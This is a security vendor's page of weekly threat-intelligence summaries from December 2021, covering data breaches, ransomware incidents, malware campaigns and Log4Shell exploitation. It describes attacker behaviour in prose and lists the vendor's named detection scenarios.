The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

Broward Health Data Breach

December 29, 2021

Broward Health Data Breach

Industry: Health | Level: Strategic | Source: BleepingComputer

Florida-based Broward Health disclosed a data breach occurring on October 15th, 2021. The breach impacted 1,357,879 individuals with the organization identifying the incident four days later, the same day the FBI and the US Department of Justice were notified. The intrusion to the hospital’s network impacted patient data, including names, birth dates, physical addresses, phone numbers, financial information, social security numbers, emails, medical information/history, and more.

Lapsus$ Ransomware Gang Hacks Portugal’s Media Conglomerate, Impresa

December 29, 2021

Lapsus$ Ransomware Gang Hacks Portugal’s Media Conglomerate, Impresa

Industry: Entertainment | Level: Strategic | Source: TheRecord

Over the course of the New Years’ weekend, Impresa a large media conglomerate in Portugal, was compromised by Lapsus$ ransomware gang. The attack impacted television channel, SIC and weekly newspaper Expresso. Compromises to the company’s IT infrastructure forced websites for the associated media platforms to be offline. The Lapsus$ gang took credit for the attack, having defaced Impresa’s sites leaving a ransomware note. In addition, the group claims to have access to the company’s Amazon Web Service account.

Diavol Ransomware – DFIR Report

December 29, 2021

Diavol Ransomware – DFIR Report

Industry: N/A | Level: Operational | Source: DFIR-Report

Intrusion analysis from The DFIR Report identified a BazarLoader infection leading to the deployment of Diavol Ransomware. The threat actor associated with Diavol ransomware is suspected to be Wizard Spider. The intrusion spanned over the course of three days in which the threat actors initial access was obtained from BazarLoader, delivered through a phishing email containing a malicious OneDrive link and following the infection, internal reconnaissance activity was initiated along with the execution of a batch script obtaining credentials located in the registry hives. Following an 18 hour break in activity, additional reconnaissance activity was initiated along with usage of the Rubeus tool, lateral movement with RDP and AnyDesk, with data exfiltration using FileZilla. Lastly, along with ransomware deployment a batch script was executed removing volume shadow compiles and stopping services.

  • Anvilogic Scenarios:
    • Diavol Ransomware
    • BazarLoader Behaviors

Purple Fox Rootkit

December 29, 2021

Purple Fox Rootkit

Industry: N/A | Level: Tactical | Source: Minerva-Labs

Research from Minerva reports MalwareHunterTeam, identified a malicious Telegram installer compiled in AutoIt, named “Telegram Desktop.exe.” Resulting in infection with the Purple Fox rootkit. The telegram installer attempts to evade detection utilizing small files with the first batch dropped from the initial “Telegram Desktop.exe” executable then copies specific files to the ProgramData folder, launching an executable and deleting the recently downloaded files. Following registry modifications, additional malicious files are downloaded initiating actions to run a new driver service, bypass UAC and stop AV. The final stages of the attack exfiltrate any collected information for AV products to the C2 server and download the purple fox rootkit.

  • Anvilogic Scenario: Malicious Telegram Installer
  • Anvilogic Use Cases:
    • Executable Create Script Process
    • Driver as Command Parameter
    • Suspicious Registry Key Created
    • Suspicious DLLhost Execution

BlackTech – “Flagpro”

December 29, 2021

BlackTech – “Flagpro”

Industry: N/A | Level: Operational | Source: NTTSecurity

Threat Actor Group – “BlackTech” has been observed by NTT Security utilizing a new malware called “Flagpro,” actively targeting Japanese companies. The malware is used in the initial stages of the attack, dropped through spear-phishing emails in a zip attachment containing a malicious Excel document with a macro. Following macro execution, the Flagpro exe is dropped into the startup directly where it executes on the next system launch. The malware communicates with the C2 server through base64 encoded traffic, with additional functions including the ability to download additional tools, execute OS commands and collect and send Windows authentication information. If the attacker identifies the compromised Flagpro host to be compatible, they’ll proceed in downloading the second stage malware.

  • Anvilogic Scenario: BlackTech – FlagPro – Behaviors

ONUS Compromised from Log4Shell

December 29, 2021

ONUS Compromised from Log4Shell

Industry: Technology | Level: Tactical | Source: Cystack

Compromise of ONUS, a cryptocurrency platform in Vietnam was reported by CyStack as the company’s payment software from “Cyclos” was vulnerable to CVE-2021-44228/Log4Shell. Insecure misconfigurations with the company’s AWS S3 buckets escalated the attack. Details of the attack involve using Log4Shell payloads to establish a malicious connection, read file “cyclos.properties” containing AWS credentials led attackers to capitalize on the ONUS misconfigurations of granting “AmazonS3FullAccess permission to the access key which allowed attackers to compromise and easily delete all of the S3 buckets. Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information.” They also downloaded a backdoor on the server disguised as the Linux operating system’s kworker service that tunneled a connection to the attacker’s C2 server using SSH. The impact of the attack involves the compromise of 2 million ONUS, information that includes EKYC and personal data, and password hashes being leaked.

  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • AWS S3 Bucket Manipulation
    • SSH Pivoting

Aquatic Panda

December 29, 2021

Aquatic Panda

Industry: Education | Level: Operational | Source: CrowdStrike

Observation of the Log4Shell vulnerability from CrowdStrike’s OverWatch team identified an attempted exploit by “Aquatic Panda” against an unnamed academic institution. It started from reviewing suspicious activity from a Tomcat process running under a vulnerable VMware Horizon instance. A combination of a suspicious activity involved the threat actor running multiple connectivity checks through DNS lookups for a specific subdomain and attempting to execute curl and wget commands to retrieve tools that were also peculiar as the execution of Linux commands were on a Windows host for the Apache Tomcat service. As the affected institution worked towards mitigating the attack, OverWatch researchers continued to track the attack identifying reconnaissance activity for system privileges, downloading additional scripts through a PowerShell Base64-encoded command dropping three files with VBS file extensions and when decoded with “cscript.exe” were identified as an EXE, DLL and DAT file. Attempts to harvest credentials were found when to dump LSASS memory and using WinRAR to compress the memory dump for exfiltration. Eventually, the victim organization was able to patch the vulnerable application and thus stopped any further activity from Aquatic Panda.

  • Anvilogic Scenario: Aquatic Panda – Behaviors

Conti & Log4Shell from AdvIntel

December 21, 2021

Conti & Log4Shell from AdvIntel

Industry: N/A | Level: Tactical | Source: AdvIntel

Continued vigilance on the threat landscape due to Log4Shell, has identified the Conti ransomware group showing signs of interest. A report from AdvIntel, detailed Conti had been deprived of new viable attack vectors since November, but had been searching for new methods. It wasn’t until the fallout of Log4Shell the ransomware group finally found what they’d been looking for. Multiple Conti members have been identified initiating scanning activity for the exploit. A recent quote from AdvIntel confirmed, “the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions.”

  • Anvilogic Scenarios:
    • Log4Shell Payload
    • Kinsing Behaviors
    • Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • File Download (Unix)
    • Modify File Attributes

McMenamins Suffers Conti Ransomware Attack

December 21, 2021

McMenamins suffers Conti Ransomware Attack

Industry: Hospitality, Food & Beverage | Level: Strategic | Source: BleepingComputer

A ransomware attack by Conti, disrupted operations for Portland brewery and hotel chain McMenamins. The attack occurred on December 12th, 2021, and impacted point-of-sale systems, servers, and workstations forcing McMenamins to shut their IT systems down. The investigation is ongoing and it is unknown at the moment if there is any impact on customer data.

Sports Gear Sites Data Breach Impacts 1.8 Million People

December 21, 2021

Sports Gear Sites data breach impacts 1.8 million people

Industry: Retail | Level: Strategic | Source: BleepingComputer

A law firm representing four affiliated online sports gear sites Tackle Warehouse LLC, Running Warehouse LLC, Tennis Warehouse LCC and Skate Warehouse LLC, has disclosed a cyberattack resulting in stolen credit card information impacting 1,813,224 customers. The breach was identified on October 15th, and confirmed on November 29th. Compromised data includes name, financial account number, credit/debit card numbers with CVV, and website account password. No details are provided on the cyberattack and notices were sent to impacted customers by the company, however no identity protection service was provided.